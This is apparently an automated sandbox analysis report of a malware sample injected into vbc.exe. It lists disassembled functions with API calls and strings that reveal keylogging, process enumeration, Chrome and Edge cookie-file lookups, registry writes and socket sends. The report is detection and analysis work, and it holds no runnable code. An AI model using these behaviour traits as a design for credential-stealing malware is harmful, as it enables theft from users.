Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58

Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
CloseHandle.KERNEL32(00000000), ref: 0040FB05

Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 4269425633-0
Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A

Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443E6B
_free.LIBCMT ref: 00443E8B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84

Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F363
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
_free.LIBCMT ref: 0044F3BF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9

Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
_free.LIBCMT ref: 004482D3
_free.LIBCMT ref: 004482FA
SetLastError.KERNEL32(00000000), ref: 00448307
SetLastError.KERNEL32(00000000), ref: 00448310

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D

Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D4

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 004509E6
_free.LIBCMT ref: 004509F8
_free.LIBCMT ref: 00450A0A
_free.LIBCMT ref: 00450A1C

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C

Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444066

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00444078
_free.LIBCMT ref: 0044408B
_free.LIBCMT ref: 0044409C
_free.LIBCMT ref: 004440AD

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF

Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

PkGNG, xrefs: 0044BA39

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9

Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044E738
_free.LIBCMT ref: 0044E855

Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44

Strings

., xrefs: 0044EA0C
*?, xrefs: 0044E72C

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54

Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00415B0F
GetTickCount.KERNEL32 ref: 00415B86

Strings

NG, xrefs: 00415B3E
!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: !D@$NG
API String ID: 180926312-2721294649
Opcode ID: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
Opcode Fuzzy Hash: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

XQG, xrefs: 00409F48
PG, xrefs: 00409EFE
NG, xrefs: 00409F33

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsend
String ID: XQG$NG$PG
API String ID: 1634807452-3565412412
Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649

Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3

Strings

`#D, xrefs: 004424ED
`#D, xrefs: 00442400

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: `#D$`#D
API String ID: 885266447-2450397995
Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44

Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000104), ref: 00443475
_free.LIBCMT ref: 00443540
_free.LIBCMT ref: 0044354A

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 0044346C, 00443473, 004434A2, 004434DA

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
API String ID: 2506810119-50795131
Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98

Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
GetLastError.KERNEL32 ref: 0044B931

Strings

PkGNG, xrefs: 0044B821

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: PkGNG
API String ID: 2456169464-263838557
Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4

Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

/sort "Visit Time" /stext ", xrefs: 004040B2
0NG, xrefs: 00404097

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0NG
API String ID: 368326130-3219657780
Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99

Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004162F5

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

!D@, xrefs: 00417089
PG, xrefs: 00416322
okmode, xrefs: 0041630F

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$okmode$PG
API String ID: 3411444782-3370592832
Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D

Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688

Strings

User Data\Default\Network\Cookies, xrefs: 0040C603
User Data\Profile ?\Network\Cookies, xrefs: 0040C635

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698

Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757

Strings

User Data\Default\Network\Cookies, xrefs: 0040C6D2
User Data\Profile ?\Network\Cookies, xrefs: 0040C704

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698

Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Strings

Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB

Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86

Strings

Online Keylogger Started, xrefs: 0040AF03, 0040AF0C, 0040AF36

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
Opcode Fuzzy Hash: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB

Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

%02i:%02i:%02i:%03i , xrefs: 0041B51E
| , xrefs: 0041B53C
PkGNG, xrefs: 0041B4EF

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i $PkGNG
API String ID: 481472006-3277280411
Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A

Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00404F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00404F94

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
